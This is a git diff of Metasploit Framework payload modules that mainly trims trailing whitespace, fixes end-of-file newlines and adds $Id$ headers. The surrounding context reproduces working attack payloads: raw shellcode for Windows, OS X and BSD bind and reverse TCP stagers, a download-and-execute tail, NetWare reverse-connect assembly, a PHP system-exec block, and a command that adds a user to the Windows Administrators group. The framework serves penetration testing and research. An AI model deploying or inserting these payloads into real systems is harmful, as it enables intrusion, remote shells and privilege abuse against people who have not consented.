@@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -46,7 +46,7 @@ module Metasploit3 #{php_preamble({:disabled_varname => dis})} #{php_system_block({:cmd_varname=>"$c", :disabled_varname => dis})} END_OF_PHP_CODE - + return Rex::Text.compress(shell) end diff --git a/modules/payloads/singles/tty/unix/interact.rb b/modules/payloads/singles/tty/unix/interact.rb index eb4d0002ca..ad9707bd8c 100644 --- a/modules/payloads/singles/tty/unix/interact.rb +++ b/modules/payloads/singles/tty/unix/interact.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ diff --git a/modules/payloads/singles/windows/adduser.rb b/modules/payloads/singles/windows/adduser.rb index 9bbd90412c..94d6b53d89 100644 --- a/modules/payloads/singles/windows/adduser.rb +++ b/modules/payloads/singles/windows/adduser.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -51,10 +51,10 @@ module Metasploit3 def command_string user = datastore['USER'] || 'metasploit' pass = datastore['PASS'] || '' - + if(pass.length > 14) raise ArgumentError, "Password for the adduser payload must be 14 characters or less" - end + end return "cmd.exe /c net user #{user} #{pass} /ADD && " + "net localgroup Administrators #{user} /ADD" diff --git a/modules/payloads/singles/windows/download_exec.rb b/modules/payloads/singles/windows/download_exec.rb index 709ef800b3..3851aa362a 100644 --- a/modules/payloads/singles/windows/download_exec.rb +++ b/modules/payloads/singles/windows/download_exec.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -15,7 +15,7 @@ require 'msf/core/payload/windows/exec' module Metasploit3 - + include Msf::Payload::Windows include Msf::Payload::Single @@ -29,7 +29,7 @@ module Metasploit3 'Platform' => 'win', 'Arch' => ARCH_X86, 'Privileged' => false, - 'Payload' => + 'Payload' => { 'Offsets' => { }, 'Payload' => @@ -54,10 +54,10 @@ module Metasploit3 "\xD8\x99\xCE\xF0\xF7\xDC\xE1\xFC\xFA\x99\xDC\xE1\xF0\xED\xCD\xF1"+ "\xEB\xFC\xF8\xFD\x99\xD5\xF6\xF8\xFD\xD5\xF0\xFB\xEB\xF8\xEB\xE0"+ "\xD8\x99\xEC\xEB\xF5\xF4\xF6\xF7\x99\xCC\xCB\xD5\xDD\xF6\xEE\xF7"+ - "\xF5\xF6\xF8\xFD\xCD\xF6\xDF\xF0\xF5\xFC\xD8\x99" + "\xF5\xF6\xF8\xFD\xCD\xF6\xDF\xF0\xF5\xFC\xD8\x99" } )) - + # EXITFUNC is not supported :/ deregister_options('EXITFUNC') diff --git a/modules/payloads/singles/windows/exec.rb b/modules/payloads/singles/windows/exec.rb index 3ef2aac265..c49e9883c8 100644 --- a/modules/payloads/singles/windows/exec.rb +++ b/modules/payloads/singles/windows/exec.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -23,4 +23,4 @@ module Metasploit3 include Msf::Payload::Windows::Exec -end \ No newline at end of file +end diff --git a/modules/payloads/singles/windows/x64/exec.rb b/modules/payloads/singles/windows/x64/exec.rb index d85ae2839a..9117837c65 100644 --- a/modules/payloads/singles/windows/x64/exec.rb +++ b/modules/payloads/singles/windows/x64/exec.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -55,7 +55,7 @@ module Metasploit3 )) register_options( [ OptString.new('CMD', [ true, "The command string to execute" ]), ], self.class ) end - + def generate return super + command_string + "\x00" end @@ -63,5 +63,5 @@ module Metasploit3 def command_string return datastore['CMD'] || '' end - + end diff --git a/modules/payloads/stagers/bsd/x86/bind_tcp.rb b/modules/payloads/stagers/bsd/x86/bind_tcp.rb index 408d833a43..bc50121fec 100644 --- a/modules/payloads/stagers/bsd/x86/bind_tcp.rb +++ b/modules/payloads/stagers/bsd/x86/bind_tcp.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -51,4 +51,4 @@ module Metasploit3 )) end -end \ No newline at end of file +end diff --git a/modules/payloads/stagers/bsd/x86/find_tag.rb b/modules/payloads/stagers/bsd/x86/find_tag.rb index 78ee185353..77e8b6e3f7 100644 --- a/modules/payloads/stagers/bsd/x86/find_tag.rb +++ b/modules/payloads/stagers/bsd/x86/find_tag.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -50,4 +50,4 @@ module Metasploit3 )) end -end \ No newline at end of file +end diff --git a/modules/payloads/stagers/bsd/x86/reverse_tcp.rb b/modules/payloads/stagers/bsd/x86/reverse_tcp.rb index ded0536194..835c141614 100644 --- a/modules/payloads/stagers/bsd/x86/reverse_tcp.rb +++ b/modules/payloads/stagers/bsd/x86/reverse_tcp.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -51,4 +51,4 @@ module Metasploit3 )) end -end \ No newline at end of file +end diff --git a/modules/payloads/stagers/bsdi/x86/bind_tcp.rb b/modules/payloads/stagers/bsdi/x86/bind_tcp.rb index 45b7bf333c..4fa1e6a9e0 100644 --- a/modules/payloads/stagers/bsdi/x86/bind_tcp.rb +++ b/modules/payloads/stagers/bsdi/x86/bind_tcp.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ diff --git a/modules/payloads/stagers/bsdi/x86/reverse_tcp.rb b/modules/payloads/stagers/bsdi/x86/reverse_tcp.rb index 2d95e42000..60dba2ba05 100644 --- a/modules/payloads/stagers/bsdi/x86/reverse_tcp.rb +++ b/modules/payloads/stagers/bsdi/x86/reverse_tcp.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -52,4 +52,4 @@ module Metasploit3 )) end -end \ No newline at end of file +end diff --git a/modules/payloads/stagers/linux/x86/bind_ipv6_tcp.rb b/modules/payloads/stagers/linux/x86/bind_ipv6_tcp.rb index 9bcc174b1f..c2ca3dc1b0 100644 --- a/modules/payloads/stagers/linux/x86/bind_ipv6_tcp.rb +++ b/modules/payloads/stagers/linux/x86/bind_ipv6_tcp.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ diff --git a/modules/payloads/stagers/linux/x86/bind_tcp.rb b/modules/payloads/stagers/linux/x86/bind_tcp.rb index 7c1151e25f..72c2cc7154 100644 --- a/modules/payloads/stagers/linux/x86/bind_tcp.rb +++ b/modules/payloads/stagers/linux/x86/bind_tcp.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -26,7 +26,7 @@ module Metasploit3 include Msf::Payload::Stager include Msf::Payload::Linux - + def initialize(info = {}) super(merge_info(info, 'Name' => 'Bind TCP Stager', diff --git a/modules/payloads/stagers/linux/x86/find_tag.rb b/modules/payloads/stagers/linux/x86/find_tag.rb index b917ae58cb..5efb1083fc 100644 --- a/modules/payloads/stagers/linux/x86/find_tag.rb +++ b/modules/payloads/stagers/linux/x86/find_tag.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -26,7 +26,7 @@ module Metasploit3 include Msf::Payload::Stager include Msf::Payload::Linux - + def initialize(info = {}) super(merge_info(info, 'Name' => 'Find Tag Stager', diff --git a/modules/payloads/stagers/linux/x86/reverse_ipv6_tcp.rb b/modules/payloads/stagers/linux/x86/reverse_ipv6_tcp.rb index cb7850fa2f..a32cee5394 100644 --- a/modules/payloads/stagers/linux/x86/reverse_ipv6_tcp.rb +++ b/modules/payloads/stagers/linux/x86/reverse_ipv6_tcp.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ diff --git a/modules/payloads/stagers/linux/x86/reverse_tcp.rb b/modules/payloads/stagers/linux/x86/reverse_tcp.rb index 6f6b767f69..a19c668ab8 100644 --- a/modules/payloads/stagers/linux/x86/reverse_tcp.rb +++ b/modules/payloads/stagers/linux/x86/reverse_tcp.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -26,7 +26,7 @@ module Metasploit3 include Msf::Payload::Stager include Msf::Payload::Linux - + def initialize(info = {}) super(merge_info(info, 'Name' => 'Reverse TCP Stager', diff --git a/modules/payloads/stagers/netware/reverse_tcp.rb b/modules/payloads/stagers/netware/reverse_tcp.rb index 2ebbd2af21..686becefec 100644 --- a/modules/payloads/stagers/netware/reverse_tcp.rb +++ b/modules/payloads/stagers/netware/reverse_tcp.rb @@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -96,7 +100,7 @@ main_code: mov bp, word ptr [ebx+0x4E] shl ebp, 16 mov bp, word ptr [ebx+0x48] - + f_finddebugger: cmp dword ptr[ebp], 0 jnz f_next @@ -121,12 +125,12 @@ resolv_ptrs: dec cl test cl, cl jnz resolv_ptrs - + sti // remove CIFS lock call [edi-4] // NSS.NLM|NSSMPK_UnlockNss - + // allocate heap buffer to remove the code from the stack (if on the stack) // network functions will give back control to the kernel and we don't want // the driver to erase our shellcode @@ -157,7 +161,7 @@ reverse_connect: mov esi, eax test eax, eax jz end - + push ebx push ebx push LHOST diff --git a/modules/payloads/stagers/osx/armle/bind_tcp.rb b/modules/payloads/stagers/osx/armle/bind_tcp.rb index 670c5f5e65..3a9847e67f 100644 --- a/modules/payloads/stagers/osx/armle/bind_tcp.rb +++ b/modules/payloads/stagers/osx/armle/bind_tcp.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -145,17 +145,17 @@ module Metasploit3 end def handle_intermediate_stage(conn, payload) - + print_status("Transmitting stage length value...(#{payload.length} bytes)") address_format = 'V' - + # Transmit our intermediate stager conn.put( [ payload.length ].pack(address_format) ) Rex::ThreadSafe.sleep(0.5) return true - end - -end \ No newline at end of file + end + +end diff --git a/modules/payloads/stagers/osx/armle/reverse_tcp.rb b/modules/payloads/stagers/osx/armle/reverse_tcp.rb index 2125659d46..6fa8554136 100644 --- a/modules/payloads/stagers/osx/armle/reverse_tcp.rb +++ b/modules/payloads/stagers/osx/armle/reverse_tcp.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -73,7 +73,7 @@ module Metasploit3 0x5c110200, # host 192.168.0.135 - 0x8700a8c0, + 0x8700a8c0, # connect 0xe1a0000a, # mov r0, r10 @@ -114,24 +114,24 @@ module Metasploit3 # exit process 0xe3a0c001, # mov r12, #0x1 0xef000080, # swi 128 - ].pack("V*") + ].pack("V*") } )) end def handle_intermediate_stage(conn, payload) - + print_status("Transmitting stage length value...(#{payload.length} bytes)") address_format = 'V' - + # Transmit our intermediate stager conn.put( [ payload.length ].pack(address_format) ) Rex::ThreadSafe.sleep(0.5) return true - end - -end \ No newline at end of file + end + +end diff --git a/modules/payloads/stagers/osx/ppc/bind_tcp.rb b/modules/payloads/stagers/osx/ppc/bind_tcp.rb index 01b5d527a9..758c672d85 100644 --- a/modules/payloads/stagers/osx/ppc/bind_tcp.rb +++ b/modules/payloads/stagers/osx/ppc/bind_tcp.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -57,4 +57,4 @@ module Metasploit3 )) end -end \ No newline at end of file +end diff --git a/modules/payloads/stagers/osx/ppc/find_tag.rb b/modules/payloads/stagers/osx/ppc/find_tag.rb index 9891f9144b..10019a46b6 100644 --- a/modules/payloads/stagers/osx/ppc/find_tag.rb +++ b/modules/payloads/stagers/osx/ppc/find_tag.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -51,7 +51,7 @@ module Metasploit3 } )) end - + # # Replace the TAG handler to just use two bytes # @@ -62,6 +62,6 @@ module Metasploit3 end return false - end + end -end \ No newline at end of file +end diff --git a/modules/payloads/stagers/osx/ppc/reverse_tcp.rb b/modules/payloads/stagers/osx/ppc/reverse_tcp.rb index 4ca9d48b1c..77b39a6ea2 100644 --- a/modules/payloads/stagers/osx/ppc/reverse_tcp.rb +++ b/modules/payloads/stagers/osx/ppc/reverse_tcp.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -55,4 +55,4 @@ module Metasploit3 )) end -end \ No newline at end of file +end diff --git a/modules/payloads/stagers/osx/x86/bind_tcp.rb b/modules/payloads/stagers/osx/x86/bind_tcp.rb index 8e9756835d..2190055d81 100644 --- a/modules/payloads/stagers/osx/x86/bind_tcp.rb +++ b/modules/payloads/stagers/osx/x86/bind_tcp.rb @@ -25,7 +25,7 @@ module Metasploit3 'Handler' => Msf::Handler::BindTcp, 'Convention' => 'sockedi', 'Stager' => - { + { 'Offsets' => { 'LPORT' => [ 27, 'n'] }, 'Payload' => "\x31\xc0\x99\x50\x40\x50\x40\x50"+ diff --git a/modules/payloads/stagers/osx/x86/reverse_tcp.rb b/modules/payloads/stagers/osx/x86/reverse_tcp.rb index c99dac0e7a..b8ddfc8319 100644 --- a/modules/payloads/stagers/osx/x86/reverse_tcp.rb +++ b/modules/payloads/stagers/osx/x86/reverse_tcp.rb @@ -1,3 +1,14 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + require 'msf/core' require 'msf/core/handler/reverse_tcp' @@ -25,9 +36,9 @@ module Metasploit3 'Handler' => Msf::Handler::ReverseTcp, 'Convention' => 'sockedi', 'Stager' => - { + { 'Offsets' => - { + { 'LHOST' => [ 20, 'ADDR'], 'LPORT' => [ 27, 'n'] }, diff --git a/modules/payloads/stagers/windows/bind_ipv6_tcp.rb b/modules/payloads/stagers/windows/bind_ipv6_tcp.rb index a66c595f0a..585aca9ae0 100644 --- a/modules/payloads/stagers/windows/bind_ipv6_tcp.rb +++ b/modules/payloads/stagers/windows/bind_ipv6_tcp.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -22,7 +22,7 @@ module Metasploit3 def self.handler_type_alias "bind_ipv6_tcp" end - + def initialize(info = {}) super(merge_info(info, 'Name' => 'Bind TCP Stager (IPv6)', @@ -42,30 +42,30 @@ module Metasploit3 }, 'Payload' => "\xfc"+ - "\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c" + - "\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32" + - "\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07" + - "\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24" + - "\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8" + - "\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x31\xd2\x64\x8b\x52" + - "\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x6a\x18\x59\x31\xff\x31" + - "\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x81" + - "\xff\x5b\xbc\x4a\x6a\x8b\x5a\x10\x8b\x12\x75\xdb\x5e\x53\x68\x8e" + - "\x4e\x0e\xec\xff\xd6\x89\xc7\x53\x68\x54\xca\xaf\x91\xff\xd6\x81" + - "\xec\x00\x01\x00\x00\x50\x57\x56\x53\x89\xe5\xe8\x27\x00\x00\x00" + - "\x90\x01\x00\x00\xb6\x19\x18\xe7\xa4\x19\x70\xe9\xe5\x49\x86\x49" + - "\xa4\x1a\x70\xc7\xa4\xad\x2e\xe9\xd9\x09\xf5\xad\xcb\xed\xfc\x3b" + - "\x57\x53\x32\x5f\x33\x32\x00\x5b\x8d\x4b\x20\x51\xff\xd7\x89\xdf" + - "\x89\xc3\x8d\x75\x14\x6a\x07\x59\x51\x53\xff\x34\x8f\xff\x55\x04" + - "\x59\x89\x04\x8e\xe2\xf2\x2b\x27\x54\x68\x02\x02\x00\x00\xff\x55" + - "\x30\x31\xc0\x50\x50\x50\x6a\x06\x6a\x01\x6a\x17\xff\x55\x2c\x89" + - "\xc7\x6a\x00\x31\xc9\x51\x51\x51\x51\x51\x68\x17\x00\xff\xff\x89" + - "\xe1\x6a\x1c\x51\x57\xff\x55\x24\x31\xdb\x53\x57\xff\x55\x28\x53" + - "\x53\x57\xff\x55\x20\x89\xc7\x6a\x40\x5e\x56\xc1\xe6\x06\x56\xc1" + - "\xe6\x08\x56\x6a\x00\xff\x55\x0c\x89\xc3\x6a\x00\x68\x00\x10\x00" + + "\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c" + + "\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32" + + "\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07" + + "\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24" + + "\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8" + + "\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x31\xd2\x64\x8b\x52" + + "\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x6a\x18\x59\x31\xff\x31" + + "\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x81" + + "\xff\x5b\xbc\x4a\x6a\x8b\x5a\x10\x8b\x12\x75\xdb\x5e\x53\x68\x8e" + + "\x4e\x0e\xec\xff\xd6\x89\xc7\x53\x68\x54\xca\xaf\x91\xff\xd6\x81" + + "\xec\x00\x01\x00\x00\x50\x57\x56\x53\x89\xe5\xe8\x27\x00\x00\x00" + + "\x90\x01\x00\x00\xb6\x19\x18\xe7\xa4\x19\x70\xe9\xe5\x49\x86\x49" + + "\xa4\x1a\x70\xc7\xa4\xad\x2e\xe9\xd9\x09\xf5\xad\xcb\xed\xfc\x3b" + + "\x57\x53\x32\x5f\x33\x32\x00\x5b\x8d\x4b\x20\x51\xff\xd7\x89\xdf" + + "\x89\xc3\x8d\x75\x14\x6a\x07\x59\x51\x53\xff\x34\x8f\xff\x55\x04" + + "\x59\x89\x04\x8e\xe2\xf2\x2b\x27\x54\x68\x02\x02\x00\x00\xff\x55" + + "\x30\x31\xc0\x50\x50\x50\x6a\x06\x6a\x01\x6a\x17\xff\x55\x2c\x89" + + "\xc7\x6a\x00\x31\xc9\x51\x51\x51\x51\x51\x68\x17\x00\xff\xff\x89" + + "\xe1\x6a\x1c\x51\x57\xff\x55\x24\x31\xdb\x53\x57\xff\x55\x28\x53" + + "\x53\x57\xff\x55\x20\x89\xc7\x6a\x40\x5e\x56\xc1\xe6\x06\x56\xc1" + + "\xe6\x08\x56\x6a\x00\xff\x55\x0c\x89\xc3\x6a\x00\x68\x00\x10\x00" + "\x00\x53\x57\xff\x55\x18\xff\xd3" } - )) + )) end end diff --git a/modules/payloads/stagers/windows/bind_nonx_tcp.rb b/modules/payloads/stagers/windows/bind_nonx_tcp.rb index 560e590fb5..4a358abdc4 100644 --- a/modules/payloads/stagers/windows/bind_nonx_tcp.rb +++ b/modules/payloads/stagers/windows/bind_nonx_tcp.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -22,7 +22,7 @@ module Metasploit3 def self.handler_type_alias "bind_nonx_tcp" end - + def initialize(info = {}) super(merge_info(info, 'Name' => 'Bind TCP Stager (No NX or Win7)', diff --git a/modules/payloads/stagers/windows/bind_tcp.rb b/modules/payloads/stagers/windows/bind_tcp.rb index 367fcb4631..2db4d822c7 100644 --- a/modules/payloads/stagers/windows/bind_tcp.rb +++ b/modules/payloads/stagers/windows/bind_tcp.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -34,7 +34,7 @@ module Metasploit3 { 'RequiresMidstager' => false, 'Offsets' => { 'LPORT' => [ 200, 'n' ] }, - 'Payload' => + 'Payload' => # Length: 298 bytes "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" + "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" + diff --git a/modules/payloads/stagers/windows/findtag_ord.rb b/modules/payloads/stagers/windows/findtag_ord.rb index 807ce58676..286e1c3ae2 100644 --- a/modules/payloads/stagers/windows/findtag_ord.rb +++ b/modules/payloads/stagers/windows/findtag_ord.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ diff --git a/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb b/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb index 2b766b33c3..bae14d0648 100644 --- a/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb +++ b/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -22,7 +22,7 @@ module Metasploit3 def self.handler_type_alias "reverse_ipv6_tcp" end - + def initialize(info = {}) super(merge_info(info, @@ -64,13 +64,13 @@ module Metasploit3 "\x02\x1b\x63\xff\xfe\x98\xbf\x36\x00\x00\x00\x00\x59\x6a\x1c\x51"+ "\x57\xff\x55\x20\x6a\x40\x5e\x56\xc1\xe6\x06\x56\xc1\xe6\x08\x56"+ "\x6a\x00\xff\x55\x0c\x89\xc3\x6a\x00\x56\x53\x57\xff\x55\x18\xff"+ - "\xd3" + "\xd3" } )) register_options( [ OptInt.new("SCOPEID", [false, "The IPv6 Scope ID, required for link-layer addresses", 0]) - ], self.class) + ], self.class) end end diff --git a/modules/payloads/stagers/windows/reverse_nonx_tcp.rb b/modules/payloads/stagers/windows/reverse_nonx_tcp.rb index 5d4e3da451..dc603a379e 100644 --- a/modules/payloads/stagers/windows/reverse_nonx_tcp.rb +++ b/modules/payloads/stagers/windows/reverse_nonx_tcp.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -23,7 +23,7 @@ module Metasploit3 def self.handler_type_alias "reverse_nonx_tcp" end - + def initialize(info = {}) super(merge_info(info, 'Name' => 'Reverse TCP Stager (No NX or Win7)', diff --git a/modules/payloads/stagers/windows/reverse_ord_tcp.rb b/modules/payloads/stagers/windows/reverse_ord_tcp.rb index 37aa8cb48e..d1b6031b19 100644 --- a/modules/payloads/stagers/windows/reverse_ord_tcp.rb +++ b/modules/payloads/stagers/windows/reverse_ord_tcp.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -47,7 +47,7 @@ module Metasploit3 "\x72\x20\xad\xad\x4e\x03\x06\x3d\x32\x33\x5f\x32\x75\xef\x8b\x6a" + "\x08\x8b\x45\x3c\x8b\x4c\x05\x78\x8b\x4c\x0d\x1c\x01\xe9\x8b\x41" + "\x58\x01\xe8\x8b\x71\x3c\x01\xee\x03\x69\x0c\x53\x6a\x01\x6a\x02" + - "\xff\xd0\x97\x68\x7f\x00\x00\x01\x68\x02\x00\x22\x11\x89\xe1\x53" + + "\xff\xd0\x97\x68\x7f\x00\x00\x01\x68\x02\x00\x22\x11\x89\xe1\x53" + "\xb7\x0c\x53\x51\x57\x51\x6a\x10\x51\x57\x56\xff\xe5" } )) diff --git a/modules/payloads/stagers/windows/reverse_tcp.rb b/modules/payloads/stagers/windows/reverse_tcp.rb index c86240fe4a..e0afce2c2d 100644 --- a/modules/payloads/stagers/windows/reverse_tcp.rb +++ b/modules/payloads/stagers/windows/reverse_tcp.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -18,7 +18,7 @@ module Metasploit3 include Msf::Payload::Stager include Msf::Payload::Windows - + def initialize(info = {}) super(merge_info(info, 'Name' => 'Reverse TCP Stager', @@ -34,7 +34,7 @@ module Metasploit3 { 'RequiresMidstager' => false, 'Offsets' => { 'LHOST' => [ 197, 'ADDR' ], 'LPORT' => [ 204, 'n' ], 'ReverseConnectRetries' => [ 195, 'C'] }, - 'Payload' => + 'Payload' => # Length: 290 bytes "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" + "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" + @@ -58,7 +58,7 @@ module Metasploit3 } )) - + end end diff --git a/modules/payloads/stagers/windows/reverse_tcp_allports.rb b/modules/payloads/stagers/windows/reverse_tcp_allports.rb index 13818184cc..741ed8b5f9 100644 --- a/modules/payloads/stagers/windows/reverse_tcp_allports.rb +++ b/modules/payloads/stagers/windows/reverse_tcp_allports.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on 